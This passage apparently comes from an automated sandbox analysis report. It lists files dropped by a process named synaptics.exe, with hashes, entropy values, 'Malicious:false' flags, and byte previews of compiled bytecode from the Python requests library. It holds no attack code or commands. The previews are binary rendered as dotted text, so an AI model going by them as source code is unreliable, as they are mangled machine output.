                                                                                                                                                                                                                Entropy (8bit):5.780548834719001
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:96:AqPoGNOeYVGivMhhFJQlIgSdAhoopVaxdses42WQXIBmPy6V7:BP8MhqKgSehwdFQYBwh
                                                                                                                                                                                                                MD5:6C12B8FE5E0706D0746759FA0B128B14
                                                                                                                                                                                                                SHA1:15244FF8D40BA3356529AE70D2FE07D2955A3A8B
                                                                                                                                                                                                                SHA-256:119FFB0CEC7D642F51AC71DD6111400C1C6A2D51D150102E01C8382C323437F1
                                                                                                                                                                                                                SHA-512:3AF315F0270C6173C1A496B38F61FA3A81BCDB146C2DAA5C729FA1A131023B55D1B0C07FD0CA3E5A18E738E983B76F93E5C9385607BDCB1F3D93652ADA7F2F35
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........!.f.........................@...sL...d.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...z.d.d.l.m.Z...W.n...e.y#......d.Z.Y.n.w.z.d.d.l.m.Z...W.n...e.y7......d.Z.Y.n.w.d.d...Z.d.d...Z.z.e.e.j.e.e.....W.n...e.e.f.y`......e...d...e.j.e.e...e.....Y.n.w.z.z.d.d.l.Z.W.n...e.ys......d.Z.Y.n.w.e.e.d.d...s.d.d.l.m.Z...e.......d.d.l.m.Z...e.e.....W.n...e.y.......Y.n.w.d.d.l.m.Z...e...d.e.....d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m Z m!Z!m"Z"m#Z#m$Z$m%Z%m&Z&m'Z'm(Z(m.Z...d.d.l)m*Z*m+Z+m,Z,m-Z-m.Z.m/Z/m0Z0m1Z1..d.d.l.m2Z2m3Z3m4Z4m5Z5m6Z6m7Z7m8Z8m9Z9m:Z:m;Z;..d.d.l<m=Z=m>Z>m?Z?..d.d.l@mAZAmBZB..d.d.lCmDZD..e..EeF...Ge.......e.j.d.e4d.d.....d.S.).a.....Requests HTTP Library.~~~~~~~~~~~~~~~~~~~~~..Requests is an HTTP library, written in Python, for human beings..Basic GET usage:.. >>> import requests. >>> r = requests.get('https://www.python.org'). >>> r.status_code. 200. >>> b'Python is a programming language' in r.content. True..... or POST:.. >>> payload = dict(key1='value1', key2='value2
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):515
                                                                                                                                                                                                                Entropy (8bit):5.466257361551644
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:12:CF+UexOsG8ReRyu7msvBXV5b4SazcAFAu63WcJaRm7hooookk:bxdOyqmsvBF5McAFAu6pJa4ek
                                                                                                                                                                                                                MD5:E7F1C4FC75A30C51B498B432C6FA4184
                                                                                                                                                                                                                SHA1:72F4FA3BE57F3CE60000FA482EDE89585BADEDEB
                                                                                                                                                                                                                SHA-256:A90D2A7905619F60CF8856839DCFD69C8A8DE5C87FD4AD4DDE1A0E97A79868A1
                                                                                                                                                                                                                SHA-512:931BED69F8AE9F7003DD4C3DF34FED2765434A5773E4193577463EABA39992883595572444BB975AAE86497BD646E0DDF2F589E129BE7B6BCA757AA0BF72C598
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........!.f.........................@...s,...d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.S.)...requestsz.Python HTTP for Humans.z.https://requests.readthedocs.ioz.2.32.3i.2..z.Kenneth Reitzz.me@kennethreitz.orgz.Apache-2.0z.Copyright Kenneth Reitzu..... .. .N)...__title__..__description__..__url__..__version__..__build__..__author__..__author_email__..__license__..__copyright__..__cake__..r....r.....CC:\Users\user\Desktop\tmp\lib\site-packages\requests\__version__.py..<module>....s........................
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):1591
                                                                                                                                                                                                                Entropy (8bit):5.638618069747913
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:24:6BUBWmfmQURGWydfvTsNWGioiklxL6yaWQ5Ycr1OlX471aNNqagEb/m5Q5lC:0UBWAmpGWydoNxLncr1OlX4Ja8me5Q+
                                                                                                                                                                                                                MD5:56EBD214EB17507859284472A5B9B3C2
                                                                                                                                                                                                                SHA1:00F5AC8928E1B86FBB21966F6A4C1672AFF927EB
                                                                                                                                                                                                                SHA-256:8754C745041465505C28A2AF13720C97BBE78C314D7B12A815945E3896099BBA
                                                                                                                                                                                                                SHA-512:A50F8747D6E34DFDE8AEF35C426715F3EC1E5F857187A2FF17077D5A84C361E5259F8AB9DDAFFDA672B99F54CBB98C6E21DBED9859BBD1DC42AEE62FDD63A32E
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........!.f.........................@...sr...d.Z.d.d.l.Z.d.d.l.m.Z...e...d...Z.e...d...Z.e...d...Z.e...d...Z.e.e.f.Z.e.e.f.Z.e.e.e.e.i.Z.d.d.d...Z.d.d...Z.d.S.).z..requests._internal_utils.~~~~~~~~~~~~~~..Provides utility functions that are consumed internally by Requests.which depend on extremely few external helpers (such as compat)......N.....)...builtin_strs....^[^:\s][^:\r\n]*$z.^[^:\s][^:\r\n]*$s....^\S[^\r\n]*$|^$z.^\S[^\r\n]*$|^$..asciic....................C...s ...t.|.t...r.|.}.|.S.|...|...}.|.S.).z.Given a string object, regardless of type, returns a representation of. that string in the native string type, encoding and decoding where. necessary. This assumes ASCII unless told otherwise.. )...isinstancer......decode)...string..encoding..out..r.....GC:\Users\user\Desktop\tmp\lib\site-packages\requests\_internal_utils.py..to_native_string....s..............r....c....................C...s4...t.|.t...s.J...z.|...d.....W.d.S...t.y.......Y.d.S.w.).z.Determine if unicode s
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):22005
                                                                                                                                                                                                                Entropy (8bit):5.429768704647921
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:384:omMHzG/lVfA1fIGIZ4Wj6EE28aauabYqpXMNpeux9URUlegWjvPWVhynNJRIVv8l:U0TQfIGw4qpmcUp5luxifgCWSYvH9yck
                                                                                                                                                                                                                MD5:391D02BC1D6FA978A47CC925C9A11267
                                                                                                                                                                                                                SHA1:648841EB08143A7AE3FB8BED399F508971A3EF4A
                                                                                                                                                                                                                SHA-256:2F04FA62F5EA060B5DF2CEC73C9C9A1E223EB91C9C16BA7F87464336F3D232F8
                                                                                                                                                                                                                SHA-512:ED4495606242BAD5FAF415B4C14C3387F94B6340532426D7727BEFD90AC07252C184ECF52813463DF33754AFF9FD3C3C56E9506481306A2E8CF201FACBE424B0
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........!.f;k.......................@...s&...d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l m!Z!..d.d.l"m#Z#..d.d.l$m%Z%m&Z&..d.d.l'm(Z(..d.d.l)m*Z*m+Z+m.Z.m,Z,m-Z-m.Z.m.Z.m/Z/m0Z0m.Z...d.d.l1m2Z2..d.d.l3m4Z4..d.d.l5m6Z6m7Z7m8Z8m9Z9m:Z:m;Z;m<Z<..z.d.d.l=m>Z>..W.n...e?y.......d.d...Z>Y.n.w.e.j@r.d.d.l1mAZA..d.ZBd.ZCd.ZDd.ZEz.d.d.lFZFe!..ZGeG.He7e6......W.n...e?y.......d.ZGY.n.w........ .!.".#.$.%.&d-d'd(..ZIG.d)d*..d*..ZJG.d+d,..d,eJ..ZKd.S.).z..requests.adapters.~~~~~~~~~~~~~~~~~..This module contains the transport adapters that Requests uses to define.and maintain connections.......N)...ClosedPoolError..ConnectTimeoutError)...HTTPError)...InvalidHeader)...LocationValueError..MaxRetryError..NewConnectionError..ProtocolError)...ProxyError)...ReadTimeoutError..ResponseError)...SSLError)...PoolManager..proxy_from_url)...Timeout)...parse_ur
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):6691
                                                                                                                                                                                                                Entropy (8bit):5.138611456762868
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:96:c4kMfrO7AyGLluXW87ZolNAzj8t8iYat9DMGm6RGmOsGmfiC:AMDY7EeZjM89eRys2C
                                                                                                                                                                                                                MD5:CE0005DD1A660FB52C18571569271CDB
                                                                                                                                                                                                                SHA1:1F1693A5B507EBD18B93A70F05C6277FBEDA837E
                                                                                                                                                                                                                SHA-256:E3822F79D20D269B291D45D6CC9D3755711F4EEB5FEF305AB95DB3835382BE39
                                                                                                                                                                                                                SHA-512:CA0A23BC8F30944113D16A242C8ECCFD9477F68993EA700BF57FB29451773BD13900BA428CFD151FDAA474186E6FB220C69FE99E87E63819064EFEEAACA6C406
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........!.f1........................@...s\...d.Z.d.d.l.m.Z...d.d...Z.d.d.d...Z.d.d...Z.d.d...Z.d.d.d...Z.d.d.d...Z.d.d.d...Z.d.d...Z.d.S.).z..requests.api.~~~~~~~~~~~~..This module implements the Requests API...:copyright: (c) 2012 by Kenneth Reitz..:license: Apache2, see LICENSE for more details.......)...sessionsc....................K...sB...t.......}.|.j.d.|.|.d...|.....W...d.........S.1.s.w.......Y...d.S.).a....Constructs and sends a :class:`Request <Request>`... :param method: method for the new :class:`Request` object: ``GET``, ``OPTIONS``, ``HEAD``, ``POST``, ``PUT``, ``PATCH``, or ``DELETE``.. :param url: URL for the new :class:`Request` object.. :param params: (optional) Dictionary, list of tuples or bytes to send. in the query string for the :class:`Request`.. :param data: (optional) Dictionary, list of tuples, bytes, or file-like. object to send in the body of the :class:`Request`.. :param json: (optional) A JSON serializable Python object to se
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):8087
                                                                                                                                                                                                                Entropy (8bit):5.484557071852769
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:192:pB0Ym1AjzLPVCFA1PCGLcBCJI1W22VjwTrhhbVYy:n0Ym1iVCOPCGLRWW22aTNhl
                                                                                                                                                                                                                MD5:ADBCD0B6FC928A24874B122485172E9C
                                                                                                                                                                                                                SHA1:0911892FF876503DA41F5F6A28803BF147579F75
                                                                                                                                                                                                                SHA-256:4606D2FB8A70BC5D3ED2915C649D92F78D6E4B6B9BEC6924B1A86DBAB1E69B79
                                                                                                                                                                                                                SHA-512:0921F614E973188CEC125CE6361E4EE7D5D9BC76005B259387ECD5DA0B660E3F1FDFCCDAC1A6C9B8972583AD1D53F26E5D0E8211350DF97CF0787784CA5BE078
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........!.f.'.......................@...s....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.Z.d.Z.d.d...Z.G.d.d...d...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.d.S.).z].requests.auth.~~~~~~~~~~~~~..This module contains the authentication handlers for Requests.......N)...b64encode.....)...to_native_string)...basestring..str..urlparse)...extract_cookies_to_jar)...parse_dict_headerz!application/x-www-form-urlencodedz.multipart/form-datac....................C...s....t.|.t...s.t.j.d...|...t.d.....t.|...}.t.|.t...s(t.j.d...t.|.....t.d.....t.|...}.t.|.t...r2|...d...}.t.|.t...r<|...d...}.d.t.t.d...|.|.f.............}.|.S.).z.Returns a Basic Auth string.z.Non-string usernames will no longer be supported in Requests 3.0.0. Please convert the object you've passed in ({!r}) to a string or bytes object in the near future to avoid problems.)...categoryz.Non-string passwords will no longer be supported in Requests 3.0
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):592
                                                                                                                                                                                                                Entropy (8bit):5.230448721366558
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:12:CrOBe1A3Dj4uIy1XfB4A4kvYa4Zk3S2sUCc01taRUcENM:qgbXKAhwa93DRC5aZ
                                                                                                                                                                                                                MD5:8A99F9F4D2CB0D845625DE32BFB172EC
                                                                                                                                                                                                                SHA1:061B419A35003A74217E878FBA02B765EBB8DF33
                                                                                                                                                                                                                SHA-256:B570E0A8D1AB3C182FDDE5177482057607B68BE1ED8ED0BA3251414DFFB43542
                                                                                                                                                                                                                SHA-512:E37D8BF307CB7AFF8878C25E4AEEFDD811BA88F2B1DE88565F277D82D0AD2E34B81600E45D02BF168FE1E0DA15ADD6D49CE2C8D3D6FD93F0B8A3FFBA21E0F7E5
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........!.f.........................@...s*...d.Z.d.d.l.m.Z...e.d.k.r.e.e.......d.S.d.S.).uF....requests.certs.~~~~~~~~~~~~~~..This module returns the preferred default CA certificate bundle. There is.only one . the one from the certifi package...If you are packaging Requests, e.g., for a Linux distribution or a managed.environment, you can change the definition of where() to return a separately.packaged CA bundle.......)...where..__main__N)...__doc__Z.certifir......__name__..print..r....r.....=C:\Users\user\Desktop\tmp\lib\site-packages\requests\certs.py..<module>....s..............
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):1743
                                                                                                                                                                                                                Entropy (8bit):5.577824354095918
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:48:3AUIkbGXHyOLyRJV79xlKPV+5MTYGi4k0b8+:3R8XyUyRJJ9jKPV+5f4kI
                                                                                                                                                                                                                MD5:E947711844B8D8B19292D7302F1F2BDC
                                                                                                                                                                                                                SHA1:A7F2F03DEE689F7416AA05F9098C95C170F6913E
                                                                                                                                                                                                                SHA-256:CA1D937E74E1569F0D84A85A492C6B632393B95B47DC0F6FB8497080E380C967
                                                                                                                                                                                                                SHA-512:1458D40AF30BBE67DFACF8E3D38B9B53878F73E1DFF382D5901ADAECC17DBD51E5529357D95F2409FBC396F62FEE82957288283F4851F09BA1D51F2CF47E7C89
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........!.f.........................@...sD...d.Z.d.d.l.Z.d.d.l.Z.d.d...Z.e...Z.e.j.Z.e.d...d.k.Z.e.d...d.k.Z.d.Z.z.d.d.l.Z.d.Z.W.n...e.y7......d.d.l.Z.Y.n.w.e.rAd.d.l.m.Z...n.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m Z m!Z!m"Z"m#Z#m$Z$m%Z%..d.d.l&m'Z'm(Z(m)Z)m*Z*m+Z+..e,Z-e,Z,e.Z.e,e.f.Z/e0e1f.Z2e0f.Z3d.S.).z..requests.compat.~~~~~~~~~~~~~~~..This module previously handled import compatibility issues.between Python 2 and Python 3. It remains for backwards.compatibility until the next major version.......Nc....................C...s<...d.}.d.D.].}.|.d.u.r.z.t...|...}.W.q...t.y.......Y.q.w.q.|.S.).z-Find supported character detection libraries.N)...chardet..charset_normalizer)...importlib..import_module..ImportError).r......lib..r.....>C:\Users\user\Desktop\tmp\lib\site-packages\requests\compat.py.._resolve_char_detection....s........................r..............FT)...JSONDecodeError)...OrderedDict)...Callable..Mapping..Muta
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):18686
                                                                                                                                                                                                                Entropy (8bit):5.25564225949697
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:192:VEvXh9n08OcOwp5PmoFKcA8YIL0RE9IFHQSAMGHQJCVGjxPA0lcQH:VEvXh9n08HbpZB0AVeiIVByHQs0php
                                                                                                                                                                                                                MD5:285B04E192C2EF5FB0FEC061558005B1
                                                                                                                                                                                                                SHA1:81B2A9E971EB6F0774DA79E2C9094EFBF4F35CE2
                                                                                                                                                                                                                SHA-256:B6AA379BA64F31C2BA7EA69E78297A68A3AD57153CA28533A5398F36D3E009D8
                                                                                                                                                                                                                SHA-512:B44EB87084C28350361DEC41A7256FE76876021B6320433AC2E2F43C5BE0D6267E0CC5E5F1ABC917290E77A3A3C67110074B4DDF971E9BCC801D3224B1C3CEB0
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........!.f.H.......................@...s....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z...z.d.d.l.Z.W.n...e.y5......d.d.l.Z.Y.n.w.G.d.d...d...Z.G.d.d...d...Z.d.d...Z.d.d...Z.d.d.d...Z.G.d.d...d.e...Z.G.d.d...d.e.j.e...Z.d.d...Z.d.d...Z.d.d...Z.d d.d...Z.d.d...Z.d.S.)!z..requests.cookies.~~~~~~~~~~~~~~~~..Compatibility code to be able to use `http.cookiejar.CookieJar` with requests...requests.utils imports from here, so be careful with imports.......N.....)...to_native_string)...Morsel..MutableMapping..cookielib..urlparse..urlunparsec....................@...s....e.Z.d.Z.d.Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d.d...Z.d.d...Z.d.d...Z.d.d...Z.e.d.d.....Z.e.d.d.....Z.e.d.d.....Z.d.S.) ..MockRequesta....Wraps a `requests.Request` to mimic a `urllib2.Request`... The code in `http.cookiejar.CookieJar` expects this interface in order to correctly. manage cookie policies, i.e., determine whether a cookie can be set, given the. domains of th
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):6194
                                                                                                                                                                                                                Entropy (8bit):4.915203142772503
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:96:PrpcnB6P/5IldtEEJiCr6dNtQlrnlGkh98RZR1YgvOHwXx:Prp9xIlv/JPr6OgH2Qh
                                                                                                                                                                                                                MD5:1FA49D78B9C6448BAE2CF33480D11B83
                                                                                                                                                                                                                SHA1:BB970809A88D2F2B2AA911FC5A2B9A16260E694C
                                                                                                                                                                                                                SHA-256:64A266F1E54085C3D1E4F8DFA68F18D5C1629A4FE5AAAB03C946F47B4CCC5BB2
                                                                                                                                                                                                                SHA-512:447BD114021463310A01B149CAE9E9C85C702BC9B7C8D05717FE71205731DFE9D7FD33AF522D30F8E9E096AB7997EA252582666512D2076B88E272BF54F9AEED
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........!.f.........................@...s....d.Z.d.d.l.m.Z...d.d.l.m.Z...G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e.e...Z.G.d.d ..d e.e...Z.G.d!d"..d"e.e...Z.G.d#d$..d$e.e...Z.G.d%d&..d&e...Z.G.d'd(..d(e...Z.G.d)d*..d*e.e...Z.G.d+d,..d,e.e...Z.G.d-d...d.e...Z.G.d/d0..d0e...Z.G.d1d2..d2e...Z.G.d3d4..d4e.e ..Z!G.d5d6..d6e...Z"d7S.)8z`.requests.exceptions.~~~~~~~~~~~~~~~~~~~..This module contains the set of Requests' exceptions.......)...HTTPError.....)...JSONDecodeErrorc........................s ...e.Z.d.Z.d.Z...f.d.d...Z.....Z.S.)...RequestExceptionzTThere was an ambiguous exception that occurred while handling your. request.. c........................sX...|...d.d...}.|.|._.|...d.d...|._.|.d.u.r!|.j.s!t.|.d...r!|.j.j.|._.t...j.|.i.|.......d.S.).zBInitialize RequestException with `request` and `response` objects...resp
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):959
                                                                                                                                                                                                                Entropy (8bit):5.186552944244859
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:24:Nx1qlJ5pMUqTDP/+/kuamY+qnvWZ3b1e7N:ERyDPGvYxS3bUx
                                                                                                                                                                                                                MD5:5E059EC21C87F6824F56A93DE1F388D6
                                                                                                                                                                                                                SHA1:498B655C71411E414921D1AC1B1DE354273E3393
                                                                                                                                                                                                                SHA-256:C5DA7329CD7E354A563BF90C6E8A6618B591F33DF33AD854EA396F82358AF117
                                                                                                                                                                                                                SHA-512:ACB1DB383C95DB041CB70D4184731E01DED6C102229262A70A92F8A903CD9B57BC67C4DA75D609C94C8AAD8E4D18B9EB9283F49C2544015B16519A01158D595F
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........!.f.........................@...s....d.Z.d.g.Z.d.d...Z.d.d...Z.d.S.).z..requests.hooks.~~~~~~~~~~~~~~..This module provides the capabilities for the Requests hooks system...Available hooks:..``response``:. The response generated from a Request....responsec....................C...s....d.d...t.D...S.).Nc....................S...s....i.|.].}.|.g...q.S...r....)....0..eventr....r.....=C:\Users\user\Desktop\tmp\lib\site-packages\requests\hooks.py..<dictcomp>....s......z!default_hooks.<locals>.<dictcomp>)...HOOKSr....r....r....r......default_hooks....s......r....c....................K...sP...|.p.i.}.|...|...}.|.r&t.|.d...r.|.g.}.|.D.].}.|.|.f.i.|.....}.|.d.u.r%|.}.q.|.S.).z6Dispatches a hook dictionary on a given piece of data...__call__N)...get..hasattr)...key..hooksZ.hook_data..kwargs..hookZ._hook_datar....r....r......dispatch_hook....s..........................r....N)...__doc__r....r....r....r....r....r....r......<module>....s............
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):24181
                                                                                                                                                                                                                Entropy (8bit):5.462612171508139
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:384:u34AgR7uY/Gf9b7UxmzVmwYB984Z2YbwFkeeiZIuWEKbXN7:u3A6Y/GpKmzVmVB9tZ2YbwFeQgEKbXN7
                                                                                                                                                                                                                MD5:8A9C2E139D027C1650260D5727A272ED
                                                                                                                                                                                                                SHA1:8F91FCFF49C67FC78847AF8B532E06480F0F2E43
                                                                                                                                                                                                                SHA-256:24553AD9726CC3505BB034B58CAE2FF621D3B6ABFFE5325F204A76A260148994
                                                                                                                                                                                                                SHA-512:2E6F7C2309BC1ED134F76F5FE45DE0664BA249E90FDE06E440553A8D920D41DE90DB047ADFB998A535B5B230817E460B7DAA772FB7CCF903677B2DE3C363693E
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........!.fZ........................@...s....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z ..d.d.l.m!Z!m"Z"m#Z#..d.d.l$m%Z%m&Z&m'Z'..d.d.l(m)Z)m*Z*m+Z+m,Z,m-Z-m.Z...d.d.l(m.Z/..d.d.l(m0Z0..d.d.l(m.Z1..d.d.l(m2Z2..d.d.l3m4Z4..d.d.l5m6Z6..d.d.l7m8Z8..d.d.l9m:Z:m;Z;m<Z<m=Z=m>Z>m?Z?m@Z@mAZAmBZBmCZC..e6jDe6jEe6jFe6jGe6jHf.ZId.ZJd.ZKd.ZLG.d.d...d...ZMG.d.d...d...ZNG.d.d ..d eN..ZOG.d!d"..d"eMeN..ZPG.d#d$..d$..ZQd.S.)%z`.requests.models.~~~~~~~~~~~~~~~..This module contains the primary objects that power Requests.......N)...UnsupportedOperation)...DecodeError..LocationParseError..ProtocolError..ReadTimeoutError..SSLError)...RequestField)...encode_multipart_formdata)...parse_url.....)...to_native_string..unicode_is_ascii)...HTTPBasicAuth)...Callable..JSONDecodeError..Mapping..basestring..builtin_str..chardet..cookielib)...json)...urlencode..urlsplit..urlunparse)..._copy_
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):596
                                                                                                                                                                                                                Entropy (8bit):5.392829244126364
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:12:C2zQ2Z1N6EzEq+sH5MWR6hxtRHV/bCJHRi/uelmXifqI0I9IGm1yaRhCUV/X:Twnq+sHIztRERi/uAfz3pmUahCmX
                                                                                                                                                                                                                MD5:033C56A5DB17CB2374B7A49E8CF33770
                                                                                                                                                                                                                SHA1:E74FD392465928623B67D93D2C13970F411D9607
                                                                                                                                                                                                                SHA-256:853F716266FD8570978DF1E21837EA29623DC528D1C2A736BAB5F8C0D989526E
                                                                                                                                                                                                                SHA-512:3CC40F8483D238CFC8F45C2E1CE2E7B93D2DE4B6B8C667A4853A4CC702BBFDDF420B1716767058457123A5C9743548F671AFA9FF5496544F9065851B46E7BBFB
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........!.f.........................@...s....d.d.l.Z.d.d.l.m.Z...d.D.](Z.e.e...e...e.<.e.e.j...D.].Z.e.e.k.s(e...e...d.....r3e.j.e...e.j.d.e.....<.q.q.e.d.u.rke.j.Z.e.e.j...D.]+Z.e.e.k.sOe...e...d.....rje.j.e...Z.e.e.j.d.e.....<.e...e.d...Z.e.e.j.d.e.....<.qAd.S.d.S.)......N.....)...chardet)...urllib3..idna...z.requests.packages.r....)...sys..compatr......package..__import__..locals..list..modules..mod..startswith..__name__..targetZ.imported_mod..replace..r....r.....@C:\Users\user\Desktop\tmp\lib\site-packages\requests\packages.py..<module>....s(...........................................
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):19689
                                                                                                                                                                                                                Entropy (8bit):5.464587625186918
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:384:bKLx6xqoGz2kdHyVf6jLBvYANUwZaBk2bNHn8Qq:eF2GFHRjW2c/n8b
                                                                                                                                                                                                                MD5:43DF14A0CA2F72DCFEEFAAB7DE401013
                                                                                                                                                                                                                SHA1:3C401C4B47F81F19FE1D639401BA259D423F31B8
                                                                                                                                                                                                                SHA-256:96C05CD28D13ABAE70DC26DD5E72BBF2EEF65EE9C3A6CB73421B85BE0A15067C
                                                                                                                                                                                                                SHA-512:86E8D108C5B9AD910E501A93D23CD7A078A2DF4E41E770AF6456408510E9A418EAD3D2CE7E2B86A361CEF9FC2B79932F2C00A27062170750B223B18996329ED3
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........!.f.w.......................@...sj...d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l m!Z!m"Z"m#Z#m$Z$..d.d.l%m&Z&..d.d.l'm(Z(..d.d.l)m*Z*m+Z+m,Z,m-Z-m.Z.m/Z/m0Z0m1Z1m2Z2m3Z3..e.j4d.k.r.e.j5Z6n.e.j.Z6e.f.d.d...Z7e.f.d.d...Z8G.d.d...d...Z9G.d.d...d.e9..Z:d.d...Z;d.S.).z..requests.sessions.~~~~~~~~~~~~~~~~~..This module provides a Session object to manage and persist settings across.requests (cookies, auth, proxies).......N)...OrderedDict)...timedelta.....)...to_native_string)...HTTPAdapter)..._basic_auth_str)...Mapping..cookielib..urljoin..urlparse)...RequestsCookieJar..cookiejar_from_dict..extract_cookies_to_jar..merge_cookies)...ChunkedEncodingError..ContentDecodingError..InvalidSchema..TooManyRedirects)...default_hooks..dispatch_hook)...DEFAULT_REDIRECT_LIMIT..REDIRECT_STATI..PreparedRequest..Request)...codes)...CaseInsensitiveDict)...DEFAULT_P
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):4709
